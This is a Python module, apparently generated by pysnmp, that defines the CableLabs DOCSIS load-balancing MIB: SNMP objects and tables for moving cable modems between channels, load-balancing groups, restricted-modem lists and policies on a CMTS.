TimeStamp, TruthValue, TextualConvention, DisplayString, RowStatus, RowPointer, MacAddress = mibBuilder.importSymbols("SNMPv2-TC", "TimeStamp", "TruthValue", "TextualConvention", "DisplayString", "RowStatus", "RowPointer", "MacAddress")
docsLoadBalanceMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2))
docsLoadBalanceMib.setRevisions(('2004-03-10 17:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: docsLoadBalanceMib.setRevisionsDescriptions(('Initial version of this mib module.',))
if mibBuilder.loadTexts: docsLoadBalanceMib.setLastUpdated('200403101700Z')
if mibBuilder.loadTexts: docsLoadBalanceMib.setOrganization('Cable Television Laboratories, Inc')
if mibBuilder.loadTexts: docsLoadBalanceMib.setContactInfo(' Postal: Cable Television Laboratories, Inc. 400 Centennial Parkway Louisville, Colorado 80027-1266 U.S.A. Phone: +1 303-661-9100 Fax: +1 303-661-9199 E-mail: mibs@cablelabs.com')
if mibBuilder.loadTexts: docsLoadBalanceMib.setDescription('This is the MIB Module for the load balancing. Load balancing is manageable on a per-CM basis. Each CM is assigned: a) to a set of channels (a Load Balancing Group) among which it can be moved by the CMTS b) a policy which governs if and when the CM can be moved c) a priority value which can be used by the CMTS in order to select CMs to move.')
class ChannelChgInitTechMap(TextualConvention, Bits):
description = "This textual convention enumerates the Initialization techniques for Dynamic Channel Change (DCC). The techniques are represented by the 5 most significant bits (MSB). Bits 0 through 4 map to initialization techniques 0 through 4. Each bit position represents the internal associated technique as described below: reinitializeMac(0) : Reinitialize the MAC broadcastInitRanging(1): Perform Broadcast initial ranging on new channel before normal operation unicastInitRanging(2) : Perform unicast ranging on new channel before normal operation initRanging(3) : Perform either broadcast or unicast ranging on new channel before normal operation direct(4) : Use the new channel(s) directly without re-initializing or ranging Multiple bits selection in 1's means the CMTS selects the best suitable technique among the selected in a proprietary manner. An empty value or a value with all bits in '0' means no channel changes allowed"
status = 'current'
namedValues = NamedValues(("reinitializeMac", 0), ("broadcastInitRanging", 1), ("unicastInitRanging", 2), ("initRanging", 3), ("direct", 4))
docsLoadBalNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 0))
docsLoadBalMibObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1))
docsLoadBalSystem = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 1))
docsLoadBalChgOverObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2))
docsLoadBalGrpObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3))
docsLoadBalPolicyObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4))
docsLoadBalChgOverGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 1))
docsLoadBalEnable = MibScalar((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 1, 1), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalEnable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalEnable.setDescription('Setting this object to true(1) enables internal autonomous load balancing operation on this CMTS. Setting it to false(2) disables the autonomous load balancing operations. However moving a cable modem via docsLoadBalChgOverTable is allowed even when this object is set to false(2).')
docsLoadBalChgOverMacAddress = MibScalar((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 1, 1), MacAddress().clone(hexValue="000000000000")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalChgOverMacAddress.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverMacAddress.setDescription('The mac address of the cable modem that the CMTS instructs to move to a new downstream frequency and/or upstream channel.')
docsLoadBalChgOverDownFrequency = MibScalar((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1000000000))).setUnits('hertz').setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalChgOverDownFrequency.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverDownFrequency.setDescription('The new downstream frequency to which the cable modem is instructed to move. The value 0 indicates that the CMTS does not create a TLV for the downstream frequency in the DCC-REQ message. This object has no meaning when executing UCC operations.')
docsLoadBalChgOverUpChannelId = MibScalar((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1, 255)).clone(-1)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalChgOverUpChannelId.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverUpChannelId.setDescription('The new upstream channel ID to which the cable modem is instructed to move. The value -1 indicates that the CMTS does not create a TLV for the upstream channel ID in the channel change request.')
docsLoadBalChgOverInitTech = MibScalar((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 1, 4), ChannelChgInitTechMap()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalChgOverInitTech.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverInitTech.setDescription("The initialization technique that the cable modem is instructed to use when performing change over operation. By default this object is initialized with all the defined bits having a value of '1'.")
docsLoadBalChgOverCmd = MibScalar((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("any", 1), ("dcc", 2), ("ucc", 3))).clone('any')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalChgOverCmd.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverCmd.setDescription('The change over command that the CMTS is instructed use when performing change over operation. The any(1) value indicates that the CMTS is to use its own algorithm to determine the appropriate command.')
docsLoadBalChgOverCommit = MibScalar((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 1, 6), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalChgOverCommit.setReference('Data-Over-Cable Service Interface Specifications: Radio Frequency Interface Specification SP-RFIv2.0-I04-030730, Sections C.4.1, 11.4.5.1.')
if mibBuilder.loadTexts: docsLoadBalChgOverCommit.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverCommit.setDescription("The command to execute the DCC/UCC operation when set to true(1). The following are reasons for rejecting an SNMP SET to this object: - The MAC address in docsLoadBalChgOverMacAddr is not an existing MAC address in docsIfCmtsMacToCmEntry. - docsLoadBalChgOverCmd is ucc(3) and docsLoadBalChgOverUpChannelId is '-1', - docsLoadBalChgOverUpChannelId is '-1' and docsLoadBalChgOverDownFrequency is '0'. - DCC/UCC operation is currently being executed for the cable modem, on which the new command is committed, specifically if the value of docsLoadBalChgOverStatusValue is one of: messageSent(1), modemDeparting(4), waitToSendMessage(6). - An UCC operation is committed for a non-existing upstream channel ID or the corresponding ifOperStatus is down(2). - A DCC operation is committed for an invalid or non-existing downstream frequency, or the corresponding ifOperStatus is down(2). In those cases, the SET is rejected with an error code 'commitFailed'. After processing the SNMP SET the information in docsLoadBalChgOverGroup is updated in a corresponding entry in docsLoadBalChgOverStatusEntry. Reading this object always returns false(2).")
docsLoadBalChgOverLastCommit = MibScalar((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 1, 7), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalChgOverLastCommit.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverLastCommit.setDescription('The value of sysUpTime when docsLoadBalChgOverCommit was last set to true. Zero if never set.')
docsLoadBalChgOverStatusTable = MibTable((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 2), )
if mibBuilder.loadTexts: docsLoadBalChgOverStatusTable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverStatusTable.setDescription('A table of CMTS operation entries to reports the status of cable modems instructed to move to a new downstream and/or upstream channel. Using the docsLoadBalChgOverGroup objects. An entry in this table is created or updated for the entry with docsIfCmtsCmStatusIndex that correspond to the cable modem MAC address of the Load Balancing operation. docsLoadBalChgOverCommit to true(1).')
docsLoadBalChgOverStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 2, 1), ).setIndexNames((0, "DOCS-IF-MIB", "docsIfCmtsCmStatusIndex"))
if mibBuilder.loadTexts: docsLoadBalChgOverStatusEntry.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverStatusEntry.setDescription('A CMTS operation entry to instruct a cable modem to move to a new downstream frequency and/or upstream channel. An operator can use this to initiate an operation in CMTS to instruct the selected cable modem to move to a new downstream frequency and/or upstream channel.')
docsLoadBalChgOverStatusMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 2, 1, 1), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalChgOverStatusMacAddr.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverStatusMacAddr.setDescription('The mac address set in docsLoadBalChgOverMacAddress.')
docsLoadBalChgOverStatusDownFreq = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 2, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1000000000))).setUnits('hertz').setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalChgOverStatusDownFreq.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverStatusDownFreq.setDescription('The Downstream frequency set in docsLoadBalChgOverDownFrequency.')
docsLoadBalChgOverStatusUpChnId = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1, 255)).clone(-1)).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalChgOverStatusUpChnId.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverStatusUpChnId.setDescription('The upstream channel ID set in docsLoadBalChgOverUpChannelId.')
docsLoadBalChgOverStatusInitTech = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 2, 1, 4), ChannelChgInitTechMap()).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalChgOverStatusInitTech.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverStatusInitTech.setDescription('The initialization technique set in docsLoadBalChgOverInitTech.')
docsLoadBalChgOverStatusCmd = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 2, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("any", 1), ("dcc", 2), ("ucc", 3))).clone('any')).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalChgOverStatusCmd.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverStatusCmd.setDescription('The load balancing command set in docsLoadBalChgOverCmd.')
docsLoadBalChgOverStatusValue = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 2, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10))).clone(namedValues=NamedValues(("messageSent", 1), ("noOpNeeded", 2), ("modemDeparting", 3), ("waitToSendMessage", 4), ("cmOperationRejected", 5), ("cmtsOperationRejected", 6), ("timeOutT13", 7), ("timeOutT15", 8), ("rejectinit", 9), ("success", 10))).clone('waitToSendMessage')).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalChgOverStatusValue.setReference('Data-Over-Cable Service Interface Specifications: Radio Frequency Interface Specification SP-RFIv2.0-I04-030730, Sections C.4.1, 11.4.5.1.')
if mibBuilder.loadTexts: docsLoadBalChgOverStatusValue.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverStatusValue.setDescription("The status of the specified DCC/UCC operation. The enumerations are: messageSent(1): The CMTS has sent change over request message to the cable modem. noOpNeed(2): A operation was requested in which neither the DS Frequency nor the Upstream Channel ID was changed. An active value in this entry's row status indicates that no CMTS operation is required. modemDeparting(3): The cable modem has responded with a change over response of either a DCC-RSP with a confirmation code of depart(180) or a UCC-RSP. waitToSendMessage(4): The specified operation is active and CMTS is waiting to send the channel change message with channel info to the cable modem. cmOperationRejected(5): Channel Change (such as DCC or UCC) operation was rejected by the cable modem. cmtsOperationRejected(6) Channel Change (such as DCC or UCC) operation was rejected by the Cable modem Termination System. timeOutT13(7): Failure due to no DCC-RSP with confirmation code depart(180) received prior to expiration of the T13 timer. timeOutT15(8): T15 timer timed out prior to the arrival of a bandwidth request, RNG-REQ message, or DCC-RSP message with confirmation code of arrive(181) from the cable modem. rejectInit(9): DCC operation rejected due to unsupported initialization tech requested. success(10): CMTS received an indication that the CM successfully completed the change over operation. e.g., If an initialization technique of re-initialize the MAC is used, success in indicated by the receipt of a DCC-RSP message with a confirmation code of depart(180). In all other cases, success is indicated by: (1) the CMTS received a DCC-RSP message with confirmation code of arrive(181) or (2) the CMTS internally confirms the presence of the CM on the new channel.")
docsLoadBalChgOverStatusUpdate = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 2, 1, 7), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalChgOverStatusUpdate.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverStatusUpdate.setDescription('The value of sysUpTime when docsLoadBalChgOverStatusValue was last updated.')
docsLoadBalGrpTable = MibTable((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1), )
if mibBuilder.loadTexts: docsLoadBalGrpTable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpTable.setDescription('This table contains the attributes of the load balancing groups present in this CMTS.')
docsLoadBalGrpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1, 1), ).setIndexNames((0, "DOCS-LOADBALANCING-MIB", "docsLoadBalGrpId"))
if mibBuilder.loadTexts: docsLoadBalGrpEntry.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpEntry.setDescription('A set of attributes of load balancing group in the CMTS. It is index by a docsLoadBalGrpId which is unique within a CMTS. Entries in this table persist after CMTS initialization.')
docsLoadBalGrpId = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 4294967295)))
if mibBuilder.loadTexts: docsLoadBalGrpId.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpId.setDescription('A unique index assigned to the load balancing group by the CMTS.')
docsLoadBalGrpIsRestricted = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1, 1, 2), TruthValue().clone('false')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalGrpIsRestricted.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpIsRestricted.setDescription('A value true(1)Indicates type of load balancing group. A Restricted Load Balancing Group is associated to a specific provisioned set of cable modems. Restricted Load Balancing Group is used to accommodate a topology specific or provisioning specific restriction. Example such as a group that are reserved for business customers). Setting this object to true(1) means it is a Restricted Load Balancing type and setting it to false(2) means it is a General Load Balancing group type. This object should not be changed while its group ID is referenced by an active entry in docsLoadBalRestrictCmEntry.')
docsLoadBalGrpInitTech = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1, 1, 3), ChannelChgInitTechMap()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalGrpInitTech.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpInitTech.setDescription("The initialization techniques that the CMTS can use when load balancing cable modems in the load balancing group. By default this object is initialized with all the defined bits having a value of '1'.")
docsLoadBalGrpDefaultPolicy = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1, 1, 4), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalGrpDefaultPolicy.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpDefaultPolicy.setDescription('Each Load Balancing Group has a default Load Balancing Policy. A policy is described by a set of conditions (rules) that govern the load balancing process for a cable modem. The CMTS assigns this Policy ID value to a cable modem associated with the group ID when the cable modem does not signal a Policy ID during registration. The Policy ID value is intended to be a numeric reference to a row entry in docsLoadBalPolicyEntry. However, It is not required to have an existing or active entry in docsLoadBalPolicyEntry when setting the value of docsLoadBalGrpDefaultPolicy, in which case it indicates no policy is associated with the load Balancing Group. The Policy ID of value 0 is reserved to indicate no policy is associated with the load balancing group.')
docsLoadBalGrpEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1, 1, 5), TruthValue().clone('true')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalGrpEnable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpEnable.setDescription('Setting this object to true(1) enables internal autonomous load balancing on this group. Setting it to false(2) disables the load balancing operation on this group.')
docsLoadBalGrpChgOverSuccess = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalGrpChgOverSuccess.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpChgOverSuccess.setDescription('The number of successful load balancing change over operations initiated within this load balancing group.')
docsLoadBalGrpChgOverFails = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalGrpChgOverFails.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpChgOverFails.setDescription('The number of failed load balancing change over operations initiated within this load balancing group.')
docsLoadBalGrpStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1, 1, 8), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalGrpStatus.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpStatus.setDescription("Indicates the status of the row in this table. Setting this object to 'destroy' or 'notInService' for a group ID entry already referenced by docsLoadBalChannelEntry, docsLoadBalChnPairsEntry or docsLoadBalRestrictCmEntry returns an error code inconsistentValue.")
docsLoadBalChannelTable = MibTable((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 2), )
if mibBuilder.loadTexts: docsLoadBalChannelTable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChannelTable.setDescription('Lists all upstream and downstream channels associated with load balancing groups.')
docsLoadBalChannelEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 2, 1), ).setIndexNames((0, "DOCS-LOADBALANCING-MIB", "docsLoadBalGrpId"), (0, "DOCS-LOADBALANCING-MIB", "docsLoadBalChannelIfIndex"))
if mibBuilder.loadTexts: docsLoadBalChannelEntry.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChannelEntry.setDescription('Lists a specific upstream or downstream, within a load Balancing group. An entry in this table exists for each ifEntry with an ifType of docsCableDownstream(128) and docsCableUpstream(129) associated with the Load Balancing Group. Entries in this table persist after CMTS initialization.')
docsLoadBalChannelIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 2, 1, 1), InterfaceIndex())
if mibBuilder.loadTexts: docsLoadBalChannelIfIndex.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChannelIfIndex.setDescription('The ifIndex of either the downstream or upstream.')
docsLoadBalChannelStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 2, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalChannelStatus.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChannelStatus.setDescription("Indicates the status of the rows in this table. Creating entries in this table requires an existing value for docsLoadBalGrpId in docsLoadBalGrpEntry and an existing value of docsLoadBalChannelIfIndex in ifEntry, otherwise is rejected with error 'noCreation'. Setting this object to 'destroy' or 'notInService for a a row entry that is being referenced by docsLoadBalChnPairsEntry is rejected with error code inconsistentValue.")
docsLoadBalChnPairsTable = MibTable((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 3), )
if mibBuilder.loadTexts: docsLoadBalChnPairsTable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChnPairsTable.setDescription('This table contains pairs of upstream channels within a Load Balancing Group. Entries in this table are used to override the initialization techniques defined for the associated Load Balancing Group.')
docsLoadBalChnPairsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 3, 1), ).setIndexNames((0, "DOCS-LOADBALANCING-MIB", "docsLoadBalGrpId"), (0, "DOCS-LOADBALANCING-MIB", "docsLoadBalChnPairsIfIndexDepart"), (0, "DOCS-LOADBALANCING-MIB", "docsLoadBalChnPairsIfIndexArrive"))
if mibBuilder.loadTexts: docsLoadBalChnPairsEntry.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChnPairsEntry.setDescription('An entry in this table describes a channel pair for which an initialization technique override is needed. On a CMTS which supports logical upstream channels (ifType is equal to docsCableUpstreamChannel(205)), the entries in this table correspond to pairs of ifType 205. On a CMTS which only supports physical upstream channels (ifType is equal to docsCableUpstream(129)), the entries in this table correspond to pairs of ifType 129. Entries in this table persist after CMTS initialization.')
docsLoadBalChnPairsIfIndexDepart = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 3, 1, 1), InterfaceIndex())
if mibBuilder.loadTexts: docsLoadBalChnPairsIfIndexDepart.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChnPairsIfIndexDepart.setDescription('This index indicates the ifIndex of the upstream channel from which a cable modem would depart in a load balancing channel change operation.')
docsLoadBalChnPairsIfIndexArrive = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 3, 1, 2), InterfaceIndex())
if mibBuilder.loadTexts: docsLoadBalChnPairsIfIndexArrive.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChnPairsIfIndexArrive.setDescription('This index indicates the ifIndex of the upstream channel on which a cable modem would arrive in a load balancing channel change operation.')
docsLoadBalChnPairsOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 3, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("operational", 1), ("notOperational", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalChnPairsOperStatus.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChnPairsOperStatus.setDescription('Operational status of the channel pair. The value operational(1) indicates that ifOperStatus of both channels is up(1). The value notOperational(2) means that ifOperStatus of one or both is not up(1).')
docsLoadBalChnPairsInitTech = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 3, 1, 4), ChannelChgInitTechMap()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalChnPairsInitTech.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChnPairsInitTech.setDescription("Specifies initialization technique for load balancing for the Depart/Arrive pair. By default this object's value is the initialization technique configured for the Load Balancing Group indicated by docsLoadBalGrpId.")
docsLoadBalChnPairsRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 3, 1, 5), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalChnPairsRowStatus.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChnPairsRowStatus.setDescription("The object for conceptual rows creation. An attempt to create a row with values for docsLoadBalChnPairsIfIndexDepart or docsLoadBalChnPairsIfIndexArrive which are not a part of the Load Balancing Group (or for a 2.0 CMTS are not logical channels (ifType 205)) are rejected with a 'noCreation' error status reported. There is no restriction on settings columns in this table when the value of docsLoadBalChnPairsRowStatus is active(1).")
docsLoadBalRestrictCmTable = MibTable((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 4), )
if mibBuilder.loadTexts: docsLoadBalRestrictCmTable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalRestrictCmTable.setDescription('Lists all cable modems in each Restricted Load Balancing Groups.')
docsLoadBalRestrictCmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 4, 1), ).setIndexNames((0, "DOCS-LOADBALANCING-MIB", "docsLoadBalGrpId"), (0, "DOCS-LOADBALANCING-MIB", "docsLoadBalRestrictCmIndex"))
if mibBuilder.loadTexts: docsLoadBalRestrictCmEntry.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalRestrictCmEntry.setDescription('An entry of modem within a restricted load balancing group type. An entry represents a cable modem that is associated with the Restricted Load Balancing Group ID of a Restricted Load Balancing Group. Entries in this table persist after CMTS initialization.')
docsLoadBalRestrictCmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 4, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 4294967295)))
if mibBuilder.loadTexts: docsLoadBalRestrictCmIndex.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalRestrictCmIndex.setDescription('The index that uniquely identifies an entry which represents restricted cable modem(s) within each Restricted Load Balancing Group.')
docsLoadBalRestrictCmMACAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 4, 1, 2), MacAddress()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalRestrictCmMACAddr.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalRestrictCmMACAddr.setDescription('Mac Address of the cable modem within the restricted load balancing group.')
docsLoadBalRestrictCmMacAddrMask = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 4, 1, 3), OctetString().subtype(subtypeSpec=ConstraintsUnion(ValueSizeConstraint(0, 0), ValueSizeConstraint(6, 6), )).clone(hexValue="")).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalRestrictCmMacAddrMask.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalRestrictCmMacAddrMask.setDescription('A bit mask acting as a wild card to associate a set of modem MAC addresses to the same Group ID. Cable modem look up is performed first with entries containing this value not null, if several entries match, the largest consecutive bit match from MSB to LSB is used. Empty value is equivalent to the bit mask all in ones.')
docsLoadBalRestrictCmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 4, 1, 4), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalRestrictCmStatus.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalRestrictCmStatus.setDescription("Indicates the status of the rows in this table. The attempt to create an entry associated to a group ID with docsLoadBalGrpIsRestricted equal to false(2) returns an error 'noCreation'. There is no restriction on settings columns in this table any time.")
docsLoadBalPolicyTable = MibTable((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 1), )
if mibBuilder.loadTexts: docsLoadBalPolicyTable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalPolicyTable.setDescription('This table describes the set of Load Balancing policies. Rows in this table might be referenced by rows in docsLoadBalGrpEntry.')
docsLoadBalPolicyEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 1, 1), ).setIndexNames((0, "DOCS-LOADBALANCING-MIB", "docsLoadBalPolicyId"), (0, "DOCS-LOADBALANCING-MIB", "docsLoadBalPolicyRuleId"))
if mibBuilder.loadTexts: docsLoadBalPolicyEntry.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalPolicyEntry.setDescription('Entries containing rules for policies. When a load balancing policy is defined by multiple rules, all the rules apply. Load balancing rules can be created to allow for specific vendor-defined load balancing actions. However there is a basic rule that the CMTS is required to support by configuring a pointer in docsLoadBalPolicyRulePtr to the table docsLoadBalBasicRuleTable. Vendor specific rules may be added by pointing the object docsLoadBalPolicyRulePtr to proprietary mib structures. Entries in this table persist after CMTS initialization.')
docsLoadBalPolicyId = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 1, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 4294967295)))
if mibBuilder.loadTexts: docsLoadBalPolicyId.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalPolicyId.setDescription('An index identifying the Load Balancing Policy.')
docsLoadBalPolicyRuleId = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 1, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 4294967295)))
if mibBuilder.loadTexts: docsLoadBalPolicyRuleId.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalPolicyRuleId.setDescription('An index for the rules entries associated within a policy.')
docsLoadBalPolicyRulePtr = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 1, 1, 3), RowPointer().clone((0, 0))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalPolicyRulePtr.setStatus('current')
